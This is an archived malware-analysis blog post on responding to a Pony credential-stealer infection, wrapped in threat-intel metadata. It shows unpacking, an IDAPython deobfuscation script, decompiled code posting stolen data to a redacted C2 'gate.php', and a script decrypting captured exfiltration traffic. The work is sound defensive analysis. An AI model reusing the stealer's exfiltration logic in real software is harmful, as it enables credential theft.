{
	"id": "846b237d-ba81-4328-aa0a-4bbcef649fd9",
	"created_at": "2026-04-06T00:15:35.610278Z",
	"updated_at": "2026-04-10T03:30:33.391194Z",
	"deleted_at": null,
	"sha1_hash": "35cca476848cd456afbf67575d06769d089d070d",
	"title": "Practical Threat Hunting and Incidence Response : A Case of A Pony Malware Infection • Raashid Bhat",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 739087,
	"plain_text": "Practical Threat Hunting and Incidence Response : A Case of A Pony Malware Infection • Raashid Bhat\r\nPublished: 2019-07-30 · Archived: 2026-04-05 13:59:37 UTC\r\nJuly 30, 2019\r\n\r\nMost organizations opt for incident response only after a catastrophic cyber security event has taken place. Incident response and threat hunting focus on events that happen after an endpoint is hit by a cyber attack, for example a malware infection. One of the main goals of a holistic approach to threat hunting and incident response is to determine the extent of the damage done by the attack and recover as much as possible from it.\r\n\r\nIn this blog post, I will present a threat hunting and incident response scenario arising from a malware infection on an endpoint.\r\n\r\nThe first step in threat hunting is to look for infection markers, and a basic way to spot a malware infection is to look for suspicious running processes.\r\n\r\nWe quickly locate a suspicious running process named Pckntl.exe. What most people do next is upload the file to VirusTotal, but often that does the sample no justice.\r\n\r\nhttps://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection\r\nPage 1 of 9\r\n\r\nBy all means, this malware appears to be packed and obfuscated, which is perhaps why none of the anti-virus/endpoint systems were able to detect this file with full confidence.\r\n\r\nAnd this is where we have to get our hands dirty and do the nasty work: some manual analysis of this file. As soon as we dig a bit deeper, we immediately see that this is a VB6 packed file. Decompiling the file reveals lots of name mangling and obfuscation.\r\n\r\nThe code behind the VB6 packer is irrelevant to our analysis, unless you have a lot of free time on your hands. Instead of banging our heads against this useless code, we let it run and break in between to get a look at the real hidden code behind the packer.\r\n\r\nAfter running it for a while, we attach a debugger and the hidden code is finally revealed.\r\n\r\nThere are lots of strings and function calls in this code, which probably means that this is the final layer of the unpacked malware, so we dump the code to the file system.\r\n\r\nThe obvious next task is to correctly identify this malicious code. Earlier we had no luck with VirusTotal, so this time we use the malware identification platform Malpedia, created by Daniel Plohmann. This system is great for matching against Yara rules written by the community, and it has a plethora of Yara rules to match against.\r\n\r\nAnd wow, Malpedia didn't disappoint us. Impressive system. It immediately figured out which malware family this belongs to: Malpedia identified the sample as the Pony trojan.\r\n\r\nNow what does this Pony malware do?\r\n\r\nPony is a credential harvesting malware, so we will have to resurrect the forensic investigator in all of us :P. Since it is a credential harvester and the endpoint was infected, credentials were almost certainly exfiltrated from the network. This is where incident response comes into play. We will investigate the exfiltrated credentials and possibly recover them.\r\n\r\nLooking at the captured PCAP file, it is obvious that the exfiltrated data is encrypted in some way.\r\n\r\nBut before we start feeling lucky, we have another hurdle in front of us. The malware has control flow obfuscation in its code, which makes analysis terribly difficult and defeats IDA's static analysis engine. It uses the stack to steer control flow, with some instructions in between that have no side effects on EIP. To recover from this mess and let IDA recognize subroutines with proper stack alignment, we write an IDAPython script to deobfuscate this bad boy:\r\n\r\nAntiDisam = 0\r\nDebug = 0\r\n\r\ndef WriteMem(addr, buff):\r\n    # Patch bytes in debugger memory when Debug is set, otherwise in the IDB\r\n    global Debug\r\n    if Debug:\r\n        DbgWrite(addr, buff)\r\n    else:\r\n        for i in buff:\r\n            PatchByte(addr, ord(i))\r\n            addr = addr + 1\r\n    return\r\n\r\nwhile 1:\r\n    # At these two addresses only 11 bytes starting at offset 3 are NOPed out\r\n    blackList = [0x00410621, 0x004105C3]\r\n    # Obfuscation stub: push ebp / mov ebp,esp / pop ebp / push imm32 / clc / jb +1\r\n    AntiDisam = FindBinary(AntiDisam + 1, SEARCH_DOWN, \"55 8B EC 5D 68 ?? ?? ?? ?? F8 72 01\")\r\n    print(hex(AntiDisam))\r\n    if AntiDisam == 0xffffffff:\r\n        break\r\n    if AntiDisam in blackList:\r\n        WriteMem(AntiDisam + 3, \"\\x90\" * 11)\r\n        continue\r\n    WriteMem(AntiDisam, \"\\x90\" * 14)\r\n\r\n** Before and after executing script **\r\n\r\nWe start analysing from the place where it sends exfiltrated data to the C2:\r\n\r\nif ( pstm \u0026\u0026 GeneratePacket(pstm, \u0026Data) == 1 )\r\n{\r\n    for ( i = \"http://XXXX/gate.php\"; *i \u0026\u0026 !v0; ++i )\r\n    {\r\n        v3 = 2;\r\n        while ( 1 )\r\n        {\r\n            v4 = 0;\r\n            if ( SendPacket(i, pstm, (int)\u0026v4) )\r\n            {\r\n                if ( v4 )\r\n                {\r\n                    v0 = sub_40FB14(v4);\r\n                    if ( !v0 )\r\n                    {\r\n                        if ( sub_401BC0(v4) )\r\n                            v0 = sub_40FB14(v4);\r\n                    }\r\n                }\r\n            }\r\n\r\nAn abridged version of our analysis would be the following:\r\n\r\n- Data is recovered from the saved passwords of many applications (FTP, email, browser, bitcoin)\r\n- Header and metadata information is appended to the packet (PWD FILE 01 version and magic with length fields)\r\n- This packet is compressed using aPLib\r\n- Another packet header with the CRYPTED0 magic is appended, and this packet is then encrypted using RC4 with a hardcoded key\r\n- Furthermore, this packet is encrypted again using RC4, but this time with a randomly generated key, which is stored in the first 4 bytes of the packet\r\n\r\nIt would be relatively easy to turn this narrative into Python code and decrypt the exfiltrated data from the PCAP file:\r\n\r\nimport sys\r\nimport aplib  # aPLib decompressor (third-party module)\r\n\r\ndef rc4(key, data):\r\n    # RC4 helper added here: the post states RC4 but omitted the decrypt() definition\r\n    S = list(range(256))\r\n    j = 0\r\n    for i in range(256):\r\n        j = (j + S[i] + key[i % len(key)]) \u0026 0xff\r\n        S[i], S[j] = S[j], S[i]\r\n    out, i, j = bytearray(), 0, 0\r\n    for c in data:\r\n        i = (i + 1) \u0026 0xff\r\n        j = (j + S[i]) \u0026 0xff\r\n        S[i], S[j] = S[j], S[i]\r\n        out.append(c ^ S[(S[i] + S[j]) \u0026 0xff])\r\n    return bytes(out)\r\n\r\ndef main():\r\n    ciphertext = open(sys.argv[1], \"rb\").read()\r\n    key = ciphertext[0:4]  # outer layer: random RC4 key in the first 4 bytes\r\n    decrypted = rc4(key, ciphertext[4:])\r\n    key = b\"K!K\"  # inner layer: skip the 8-byte CRYPTED0 header, hardcoded RC4 key\r\n    decrypted = rc4(key, decrypted[8:])\r\n    # skip the PWDFILE header, then aPLib-decompress the credential data\r\n    open(\"FinalOutput\", \"wb\").write(aplib.decompress(decrypted[0x0c + 4:]))\r\nmain()\r\n\r\npython Decrypt.py Output.bin\r\n\r\nAnd finally we get to see the exfiltrated credentials in plain text. The attackers managed to steal some email credentials and FTP logins.\r\n\r\nSource: https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://int0xcc.svbtle.com/practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection"
	],
	"report_names": [
		"practical-threat-hunting-and-incidence-response-a-case-of-a-pony-malware-infection"
	],
	"threat_actors": [
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434535,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/35cca476848cd456afbf67575d06769d089d070d.pdf",
		"text": "https://archive.orkl.eu/35cca476848cd456afbf67575d06769d089d070d.txt",
		"img": "https://archive.orkl.eu/35cca476848cd456afbf67575d06769d089d070d.jpg"
	}
}